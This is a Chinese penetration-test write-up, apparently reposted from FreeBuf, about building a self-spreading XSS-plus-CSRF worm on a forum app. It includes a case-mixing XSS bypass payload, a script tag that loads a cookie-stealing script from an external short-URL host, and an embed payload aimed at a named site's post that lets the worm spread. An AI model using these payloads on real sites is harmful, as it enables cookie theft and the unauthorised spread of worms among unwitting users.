技术讨论 | 记一次XSS蠕虫渗透实验

栏目: 编程工具 · 发布时间: 5年前

内容简介:*本文原创作者:莫妮卡k37,本文属于FreeBuf原创奖励计划,未经许可禁止转载1.在发帖的内容处发现了存储型XSS2.对帖子(母贴)的内容进行构造,插入CSRF POC,并对其中内容输出为302永久重定向到母感染贴

*本文原创作者:莫妮卡k37,本文属于FreeBuf原创奖励计划,未经许可禁止转载

大体思路

1.在发帖的内容处发现了存储型XSS

2.对帖子(母贴)的内容进行构造,插入CSRF POC,并对其中内容输出为302永久重定向到母感染贴

3.所有浏览此页面的用户都会自动发布一个重定向到母感染贴的子贴,重定向到母贴时又再次执行母贴中的POC再次创建一个子贴。

以上就是XSS+CSRF构造蠕虫大体的思路,下面细化各个步骤的过程,水平不高,适合XSS初学者的进阶。

一、存储型XSS

1.进入发帖处,添加初步测试payload,并查看源码:

技术讨论 | 记一次XSS蠕虫渗透实验

2.观察到可以大小写混淆绕过,于是构造payload(对于屏蔽括号的可以用 ’ 来代替):

<sCrIpt>alert'xss'</sCrIpt>

技术讨论 | 记一次XSS蠕虫渗透实验

3.刷新页面观察效果,成功弹窗:

技术讨论 | 记一次XSS蠕虫渗透实验

4.插入JS脚本,利用XSS平台窃取用户cookie,这是最常用的XSS利用手法。

POC:

<sCRiPt/SrC=//60.wf/m5VP>

SRC引用的是短地址,内容为窃取用户cookie的JS脚本,详细可以使用XSS平台自动生成:

技术讨论 | 记一次XSS蠕虫渗透实验

二、XSS配合CSRF的初步测验

1.首先验证是否存在CSRF,同样在发布新贴处,填写标题内容,点击发布抓包:

技术讨论 | 记一次XSS蠕虫渗透实验

2.burp自带的生成CSRF POC,POST包处-》右键-》generate csrf poc -》保存-》使用另一个账号发送POC,查看自己的帖子,发现成功发送新帖。

3.编写JS脚本(可以利用Xss’or来生成)

技术讨论 | 记一次XSS蠕虫渗透实验

4.CSRF+存储型XSS将脚本插入到页面中:

技术讨论 | 记一次XSS蠕虫渗透实验

如图,内容为发布新帖的JS脚本,点击发布,就生成了新帖。

5.浏览此贴,提示成功:

技术讨论 | 记一次XSS蠕虫渗透实验

6.可以看到成功发布出去:

技术讨论 | 记一次XSS蠕虫渗透实验

7.使用其他用户浏览帖子测试—-发现同样不知觉的发了个新帖,至此,XSS+CSRF的攻击已经完成:

技术讨论 | 记一次XSS蠕虫渗透实验

三、蠕虫的构造

再整理一下思路。

蠕虫的前提是子贴的内容,即点击我们母感染贴的用户所发布的子贴的内容是可控的:

1.攻击者创建一个攻击帖(母帖),贴中JS脚本包含:
​
  ①创建一个子回传帖
​
  ②子回传帖的内容是重定向到母帖
​
2.用户浏览母帖,然后自动创建一个子回传帖;

3.子回传帖403重定向到母帖;
​
4.根据内容又创建一个子回传帖;
​
5.用户之间互相浏览,发散,传播,不拉不拉不拉,造成蠕虫攻击。

1.任意发表新帖:

技术讨论 | 记一次XSS蠕虫渗透实验

2.记录帖子的URL并点击编辑:

技术讨论 | 记一次XSS蠕虫渗透实验

3.插入JS脚本,其中控制子回传贴302重定向到母贴的URL。

payload:

<embed/src=/bang.duia.com/web/normal/topic/806440>

意为在页面中插入一个新页面,这个新页面为母贴。

技术讨论 | 记一次XSS蠕虫渗透实验

4.发布后浏览,已生成子回传贴:

技术讨论 | 记一次XSS蠕虫渗透实验

5.打开子回传贴,发现了在母贴JS脚本中构造的框架:

技术讨论 | 记一次XSS蠕虫渗透实验

6.但是在FireFox却很遗憾没有成功,打开Network发现了这样一个提示。意为无效的CORS(跨域资源共享)请求。猜测此处应该是属于白名单拦截,限制了JS的入口:

技术讨论 | 记一次XSS蠕虫渗透实验

7.通过IE可以运行:

技术讨论 | 记一次XSS蠕虫渗透实验 技术讨论 | 记一次XSS蠕虫渗透实验

8.重点!!这些都不是最重要的,因为这是一个APP,所以用户基本上是依赖手机端来运行。之后在手机端上查看帖子成功通过子回传URL重定向到母贴并创建了一个新的子回传贴。虽然网站可能有WAF,电脑端IE可以蠕起来,但是发现,app端没有做任何防护,直接可以传播。

技术讨论 | 记一次XSS蠕虫渗透实验 技术讨论 | 记一次XSS蠕虫渗透实验 *本文原创作者:莫妮卡k37,本文属于FreeBuf原创奖励计划,未经许可禁止转载


以上所述就是小编给大家介绍的《技术讨论 | 记一次XSS蠕虫渗透实验》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Head First JavaScript Programming

Head First JavaScript Programming

Eric T. Freeman、Elisabeth Robson / O'Reilly Media / 2014-4-10 / USD 49.99

This brain-friendly guide teaches you everything from JavaScript language fundamentals to advanced topics, including objects, functions, and the browser’s document object model. You won’t just be read......一起来看看 《Head First JavaScript Programming》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具